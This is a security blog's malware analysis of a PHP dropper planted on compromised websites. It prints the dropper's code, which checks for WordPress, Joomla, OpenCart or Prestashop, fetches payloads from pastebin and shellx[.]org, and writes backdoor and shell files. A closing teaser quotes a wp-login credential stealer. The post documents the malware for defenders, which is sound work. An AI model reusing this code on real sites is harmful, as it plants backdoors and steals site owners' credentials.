Backdoor Shell Dropper Deploys CMS-Specific Malware

Labs Note

A large majority of the malware we find on compromised websites are backdoors that allow an attacker to maintain unauthorized access to the site and execute whatever commands they want.

Another common scenario includes malware which is directly injected into a website’s files and used to redirect traffic, steal credit cards and other sensitive information, hijack resources to mine for cryptocurrencies, or even serve unwanted ads.

In this case, the attacker uploaded what we suspect to be a malicious Turkish dropper — the code comments include the Turkish language which, when translated, indicates intent to inject additional pieces of malware on the site.

One interesting aspect of this sample is that the code checks for different CMS versions (WordPress, Joomla, Opencart, Prestashop) and deploys the malware based on the current environment.

@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-load.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/.htaccess", 0644);
function http_get($url){
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close($im);
}
$hector77734 = $_SERVER['DOCUMENT_ROOT'] . "/indeeex.php" ; /**/
$hectortxt77734 = http_get('https://pastebin[.]com/raw/t4PchdWx');
@$open77734 = fopen($hector77734, 'w');
@fwrite($open77734, $hectortxt77734);
@fclose($open77734);

By default, the code attempts to change the permissions for a few files before using the cURL request through http_get() to obtain additional content from pre-defined pastebin links. The malware then writes it into indeeex.php using fwrite().

Next, the dropper targets different CMS’s — starting with Joomla specifically — by using the function file_exists() to confirm if the core file “/includes/defines.php exists.

Attackers then download additional files (joomlahide.zip and joomla.zip) from shellx[.]org:

$jooomla = $_SERVER['DOCUMENT_ROOT'] . "/includes/defines.php";
if (file_exists($jooomla)) {
$hector5 = $_SERVER['DOCUMENT_ROOT'] . "/administrator/systeam.php";
$hectortxt5 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open5 = fopen($hector5, 'w');
@fwrite($open5, $hectortxt5);
@fclose($open5);

@copy('hxxp://shellx[.]org',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomlahide.zip");
@copy('hxxp://shellx[.]org/',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomla.zip");


These zips contain two other files: a file uploader backdoor and the An0n_3xPloiTeR shell.

For the other CMS’s, they used the same method of checking if specific core files exist and downloading additional content from shellx[.]org

OpenCart

/*BURDAN Aşşağı OPENCART*/
$oopencart = $_SERVER['DOCUMENT_ROOT'] . "/system/config/";
if (file_exists($oopencart)) {

$hector44441 = $_SERVER['DOCUMENT_ROOT'] . "/catalog/view/heck.php" ;
$hectortxt44441 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open44441 = fopen($hector44441, 'w');
@fwrite($open44441, $hectortxt44441);
@fclose($open44441);

Prestashop

/*BURDAN aşşağı petrashop*/
$pretashop = $_SERVER['DOCUMENT_ROOT'] . "/config/smarty.config.inc.php";
if(file_exists($pretashop)){
mkdir($_SERVER['DOCUMENT_ROOT'] . "/modules/petra/");
$hector4 = $_SERVER['DOCUMENT_ROOT'] . "/modules/petra/image.php" ;
$hectortxt4 = http_get('https://pastebin[.]com/raw/9jDX17nP');
$open4 = fopen($hector4, 'w');
fwrite($open4, $hectortxt4);
fclose($open4);

These types of malicious droppers are often hard to detect because their goal is not to directly execute a backdoor, remote shell, or file upload. Instead, they act as a bridge between the attacker and the other malicious resources they want to inject on the website.

One of the best ways to mitigate risk and identify malicious behavior is to use  a file integrity monitoring system to detect and alert for content tampering.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post